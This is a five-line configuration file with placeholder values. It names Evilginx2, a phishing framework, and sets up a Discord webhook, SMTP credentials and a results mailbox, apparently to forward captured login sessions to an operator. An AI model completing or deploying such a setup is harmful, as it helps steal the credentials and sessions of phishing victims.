discordURL="https://discord.com/api/webhooks/url"
discordBOT="Evilginx2@DBSession"
ipstackatoken="token"
smtpAuthInfo="HOST:USERNAME:PASSWORD:PORT:ssl/tls/orblank"
mailResultTo="yourmailaddress@mail.tld"
